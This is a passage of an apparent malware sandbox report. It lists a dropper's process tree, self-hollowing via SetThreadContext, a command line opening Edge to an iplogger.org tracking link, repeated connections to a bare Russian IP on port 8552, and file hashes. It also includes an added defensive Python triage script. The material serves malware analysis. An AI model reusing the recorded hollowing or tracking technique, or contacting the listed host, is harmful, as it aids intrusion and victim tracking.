PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 1144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 1144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4244 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B19.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1XQju7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff8097d46f8,0x7ff8097d4708,0x7ff8097d4718

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 56.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
RU 95.181.157.69:8552 N/A tcp
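The tables above carry the whole story of this detonation in flattened form: the WriteProcessMemory rows give the process graph (dropper to Install.exe and RUNTIM~1.EXE, Install.exe to cmd.exe to msedge.exe), the single SetThreadContext row shows RUNTIM~1.EXE hollowing a copy of itself, the Processes list shows Edge being pointed at the iplogger.org link, and the Network table shows the only connections that Edge and certificate checks do not explain: the repeated TCP sessions to 95.181.157.69:8552 with no DNS name. The triage helper below is an added example, not part of the sandbox output, that parses those rows into exactly those findings. The embedded rows are excerpted from the tables above (a subset, with the direct-to-IP network rows in their three-field form; the parser also accepts an explicit N/A domain); the regular expressions and the "bare IP, non-web port" ranking heuristic are the example's own assumptions, not anything the sandbox implements.

```python
"""Triage helper for the flattened sandbox tables on this page (added example).

Reconstructs the process graph from the WriteProcessMemory rows, flags
same-image SetThreadContext pairs (RunPE-style hollowing), pulls URLs out of
command lines, and ranks bare-IP TCP sessions as C2 candidates.
"""
import re
from collections import Counter, defaultdict

# Rows excerpted from the behavioral2 tables above (a subset); repeats are kept
# because the sandbox emits one row per call.
WPM_ROWS = r"""
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4420 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
"""
STC_ROWS = r"""
PID 1896 set thread context of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
"""
PROC_TEXT = r"""
C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B19.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1XQju7
"""
NET_ROWS = """
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
GB 96.17.179.205:80 apps.identrust.com tcp
N/A 224.0.0.251:5353 udp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
"""

# "PID <src> <action> <dst> N/A <source image> <target image>"; the non-greedy
# group stops at the first ".exe " so paths containing spaces survive.
ROW = re.compile(r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (.+?\.exe) (.+)$", re.I)
# "<country> <ip>:<port> [<domain>] <proto>"; the domain field may be absent.
NET = re.compile(r"^(\S+) (\d{1,3}(?:\.\d{1,3}){3}):(\d+)(?: (\S+))? (tcp|udp)$")


def parse_rows(text):
    """Yield (src_pid, action, dst_pid, src_image, dst_image) per table row."""
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if m:
            yield int(m[1]), m[2].lower(), int(m[3]), m[4], m[5]


def process_tree(wpm_text):
    """Parent -> set(children) plus pid -> image.  In these reports every parent
    shows up writing to each child it spawns, so the rows double as a creation graph."""
    tree, images = defaultdict(set), {}
    for src, _, dst, src_img, dst_img in parse_rows(wpm_text):
        tree[src].add(dst)
        images.setdefault(src, src_img)
        images.setdefault(dst, dst_img)
    return dict(tree), images


def injection_pairs(stc_text):
    """SetThreadContext rows; identical images on both sides mean the loader
    started a copy of itself and is redirecting its main thread (RunPE/hollowing)."""
    return [{"src": src, "dst": dst, "image": src_img,
             "self_hollow": src_img.lower() == dst_img.lower()}
            for src, _, dst, src_img, dst_img in parse_rows(stc_text)]


def launched_urls(proc_text):
    """(image basename, url) for each Processes entry whose command line has a URL."""
    lines = [l for l in proc_text.strip().splitlines() if l.strip()]
    return [(image.rsplit("\\", 1)[-1], url)
            for image, cmd in zip(lines[0::2], lines[1::2])
            for url in re.findall(r"https?://\S+", cmd)]


def c2_candidates(net_text, web_ports=(80, 443)):
    """Count TCP sessions to a bare IP (no DNS name in the row) on a non-web port.
    A ranking heuristic, not a verdict: it says what to look at first."""
    hits = Counter()
    for line in net_text.strip().splitlines():
        m = NET.match(line.strip())
        if not m:
            continue
        ip, port, domain, proto = m[2], int(m[3]), m[4], m[5]
        if proto == "tcp" and domain in (None, "N/A") and port not in web_ports:
            hits[(ip, port)] += 1
    return hits


def triage():
    """Everything an analyst wants from this page, in one dict."""
    tree, images = process_tree(WPM_ROWS)
    return {"dropper_children": {images[p].rsplit("\\", 1)[-1] for p in tree[4196]},
            "injections": injection_pairs(STC_ROWS),
            "urls": launched_urls(PROC_TEXT),
            "c2_candidates": dict(c2_candidates(NET_ROWS))}


if __name__ == "__main__":
    import pprint
    pprint.pprint(triage())
```

Run as a script it prints the dropper's two children (Install.exe and RUNTIM~1.EXE), the 1896 to 4384 self-hollowing pair, the iplogger.org URL handed to msedge.exe, and 95.181.157.69:8552 as the only C2 candidate. Pasting the full Network table into NET_ROWS raises that count to the twelve sessions listed above; the heuristic deliberately ignores the 104.21.4.208 and 204.79.197.200 sessions because they resolve to names and sit on 443.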

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

MD5 3973c47bf5f334ea720a9d603d2c6510
SHA1 bf2b72dc12d4d41e08b452e465c40d010b2aba4e
SHA256 4e9a1202844e30f1d62d837cdb440764c851740ab8ee2bd4a8a31475bd449eea
SHA512 cafc322ba71bafad2b15b82553a2a0749d0b6cb8349fe7fd24de25f7dca48c5aa0c9e7d170571c87a55381ec21d33045d7ba9a17891aabee187358da9b406861

C:\Users\Admin\AppData\Local\Temp\7zS8B19.tmp\Install.cmd

MD5 21661026606353f423078c883708787d
SHA1 338e288b851e0e5bee26f887e50bfcd8150e8257
SHA256 6a77796213adbc0eb764c070a3fdfcb5bfa3ad9b6215c1be43f09bfd32014782
SHA512 61760ab64e2c38d9bd5102ab0106e451a5c91e1598906f92e1285b7ae1ca1c6e02480d4157d0f350d2dc816088b5b0838a5d7c7b9d80444ecbf9d62b9ca5b65b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

MD5 0c6ef320b361f01d63147dec80c3f34c
SHA1 c04adc3da100118f72e41c1c4645cbf8fa813cee
SHA256 bf89a45619528967430c483c01da54306e4f1b200a8c062697218fdd60bac93f
SHA512 f204ea35dffab3bd703ccf3a52e8ce26be5cde8f24b485b8a0c34a7dc9948bfcae3c7d2d268d5e4fd736dd55245ee995a4bfe0726e2b7fbb379095c69e9ddb69

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0764f5481d3c05f5d391a36463484b49
SHA1 2c96194f04e768ac9d7134bc242808e4d8aeb149
SHA256 cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3
SHA512 a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224

memory/1896-22-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1896-21-0x00000000006D0000-0x00000000007DA000-memory.dmp

memory/1896-23-0x0000000005190000-0x000000000522C000-memory.dmp

\??\pipe\LOCAL\crashpad_4868_NJNRXHPXUGPVIKLY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1896-30-0x00000000057E0000-0x0000000005D84000-memory.dmp

memory/1896-34-0x00000000052D0000-0x0000000005362000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e494d16e4b331d7fc483b3ae3b2e0973
SHA1 d13ca61b6404902b716f7b02f0070dec7f36edbf
SHA256 a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165
SHA512 016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737

memory/1896-37-0x00000000054E0000-0x00000000054F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c77ada37f300e9e0bc7b557806b2ef5d
SHA1 3cd6a11ff66ed37c4b207c81501d3907a3830196
SHA256 21895e84805e119ae30444b54efe32814131f454f9c90959ce297776702e013c
SHA512 313988591d81a5978e6b9de91606742f2ea2441de11c778a5614fac25ba2d62425bdd5e1f52ce57d330ea67f4dd2894a27b272addef36ba74d92e7bf480b0433

memory/1896-43-0x0000000005270000-0x000000000527A000-memory.dmp

memory/1896-44-0x00000000054F0000-0x0000000005546000-memory.dmp

memory/1896-53-0x0000000007F80000-0x0000000007F98000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bfaafc0a42b548c1a6a2d041c4cfad41
SHA1 fa362364c5e3eadd548896fa3bd3deb7f1ec9360
SHA256 9713fb1b3ea3f22e9ac286ac2b6fb96a9cca220c7c5716988b23c3c30d5e853d
SHA512 6f8b6c270cf7cd2e7e79dc47b5030f728c985c1f8921716974ae1095711c5fb2c8b3e17f27ef69ae8d8c4bd6f7c4665b29db9dc8ac8f20c36cd641afa20e258d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 75ec7bb1037d055e9daf328e57970ee5
SHA1 2cc8e7e3f7b5bc74bd0e49e76c596b569b68d7e9
SHA256 6c2cda7c08a903feac87572abc1575612b71a2e63ee87ed2140e97e17883c3f5
SHA512 0f10533f8cc6931c66f5e342a3a25899a5abd9d855eb994a90cecb38dd317812e723df1e51da0862172d23a6030afb5fe9a51c59a3372c04311cefe098c2e85f

memory/1896-82-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1896-83-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/1896-93-0x00000000080F0000-0x000000000817A000-memory.dmp

memory/1896-94-0x000000000A830000-0x000000000A84E000-memory.dmp

memory/4384-95-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RUNTIM~1.EXE.log

MD5 17573558c4e714f606f997e5157afaac
SHA1 13e16e9415ceef429aaf124139671ebeca09ed23
SHA256 c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553
SHA512 f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc

memory/1896-99-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/4384-100-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/4384-101-0x0000000005550000-0x0000000005B68000-memory.dmp

memory/4384-102-0x0000000004F30000-0x0000000004F42000-memory.dmp

memory/4384-103-0x0000000004FD0000-0x000000000500C000-memory.dmp

memory/4384-104-0x00000000051C0000-0x00000000051D0000-memory.dmp

memory/4384-105-0x0000000005010000-0x000000000505C000-memory.dmp

memory/4384-106-0x00000000052E0000-0x00000000053EA000-memory.dmp

memory/4384-120-0x0000000074FF0000-0x00000000757A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf